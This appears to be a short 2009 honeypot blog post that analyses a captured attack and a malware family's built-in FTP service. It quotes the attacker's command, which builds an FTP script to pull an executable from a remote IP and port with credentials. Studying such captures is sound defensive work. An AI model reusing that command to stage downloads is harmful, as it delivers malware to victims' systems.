Iteolih: malicious ftp services
26 Jul 2009 Markus Koetter iteolih
Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:
WinExec(“cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 » o &echo get msq16.exe » o”)
ExitThread(0)
As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.
I did not expect downloading the malware getting a problem, as all information required was available, including host credentials and filename. But, as the ftp service embedded in the malware is still special, it was a problem.
The ftp service is designed to work with the windows ftp client, the windows ftp only provides active ftp, active ftp does not work on nat if the ftp service port is not on default port 21.
Apart from that, the ftp service may fail with 6% of all ports.